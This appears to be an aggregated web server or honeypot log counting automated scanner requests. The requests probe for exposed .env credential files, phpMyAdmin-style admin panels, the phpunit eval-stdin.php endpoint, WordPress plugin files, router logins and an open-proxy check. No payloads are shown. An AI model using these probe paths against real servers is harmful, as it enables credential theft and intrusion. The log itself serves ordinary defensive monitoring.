1	GET	/sql/phpMyAdmin2/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmanager/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmy-admin/index.php?lang=en	HTTP/1.1
1	GET	/sql/phpmyadmin2/index.php?lang=en	HTTP/1.1
1	GET	/sql/sql-admin/index.php?lang=en	HTTP/1.1
1	GET	/sql/sql/index.php?lang=en	HTTP/1.1
1	GET	/sql/sqladmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/sqlweb/index.php?lang=en	HTTP/1.1
1	GET	/sql/webadmin/index.php?lang=en	HTTP/1.1
1	GET	/sql/webdb/index.php?lang=en	HTTP/1.1
1	GET	/sql/websql/index.php?lang=en	HTTP/1.1
2	GET	/sqlmanager/index.php?lang=en	HTTP/1.1
1	GET	/src/.env	HTTP/1.1
1	GET	/stalker_portal/c/	HTTP/1.1
1	GET	/stalker_portal/c/version.js	HTTP/1.1
1	GET	/storage/.env	HTTP/1.1
1	GET	/streaming/clients_live.php	HTTP/1.1
1	GET	/system_api.php	HTTP/1.1
1	GET	/vendor/.env	HTTP/1.1
1	GET	/vendor/laravel/.env	HTTP/1.1
1	GET	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1
1	GET	/wp-admin/.env/library/.env	HTTP/1.1
1	GET	/wp-content/.env	HTTP/1.1
2	GET	/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php?lang=en	HTTP/1.1
1	GET	/wp-content/plugins/wp-file-manager/readme.txt	HTTP/1.1
1	GET	/www/.env	HTTP/1.1
1	GET	http[:]//www[.]coupang[.]com/vp/products/1684080273?itemId=2868509425&vendorItemId=70857732291?q=%ED%83%88%EB%AA%A8%EC%83%B4%ED%91%B8&channel=auto	HTTP/1.1
1	HEAD	/	HTTP/1.0
1	OPTIONS	/	HTTP/1.0
1	POST	/Autodiscover/Autodiscover.xml	HTTP/1.1
1	POST	/api/jsonws/invoke	HTTP/1.1
1	POST	/boaform/admin/formLogin	HTTP/1.1
1	POST	/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php	HTTP/1.1